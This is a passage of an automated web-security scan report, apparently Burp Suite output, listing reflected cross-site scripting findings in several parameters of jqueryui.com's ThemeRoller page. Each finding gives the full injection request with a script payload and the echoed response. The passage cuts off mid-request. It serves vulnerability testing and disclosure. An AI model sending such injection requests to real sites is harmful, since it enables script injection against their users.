GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e64a53"><script>alert(1)</script>2590027d388&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e64a53"><script>alert(1)</script>2590027d388&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorE
...[SNIP]...

3.164. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e5e"><script>alert(1)</script>15d613d40d8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc31e5e"><script>alert(1)</script>15d613d40d8&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc31e5e"><script>alert(1)</script>15d613d40d8&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover
...[SNIP]...

3.165. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 717a0"><script>alert(1)</script>8ae54f49d58 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba717a0"><script>alert(1)</script>8ae54f49d58&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba717a0"><script>alert(1)</script>8ae54f49d58&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgT
...[SNIP]...

3.166. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34db"><script>alert(1)</script>974427909eb was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa34db"><script>alert(1)</script>974427909eb&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa34db"><script>alert(1)</script>974427909eb&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.167. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d610a"><script>alert(1)</script>664987fb5fe was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CFd610a"><script>alert(1)</script>664987fb5fe&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
oller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CFd610a"><script>alert(1)</script>664987fb5fe&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefaul
...[SNIP]...

3.168. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c1c"><script>alert(1)</script>8b71ac69cdd was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e97c1c"><script>alert(1)</script>8b71ac69cdd&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e97c1c"><script>alert(1)</script>8b71ac69cdd&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.169. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4924"><script>alert(1)</script>b7e5d296fe2 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666e4924"><script>alert(1)</script>b7e5d296fe2&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666e4924"><script>alert(1)</script>b7e5d296fe2&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

3.170. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb0c1"><script>alert(1)</script>2173eee1a85 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5pxbb0c1"><script>alert(1)</script>2173eee1a85&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5pxbb0c1"><script>alert(1)</script>2173eee1a85&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pn
...[SNIP]...

3.171. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e67ff"><script>alert(1)</script>d6da6a382c8 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxe67ff"><script>alert(1)</script>d6da6a382c8 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxe67ff"><script>alert(1)</script>d6da6a382c8" type="text/css" media="all" />
...[SNIP]...

3.172. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f82b"><script>alert(1)</script>9800a832c8e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=3636367f82b"><script>alert(1)</script>9800a832c8e&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd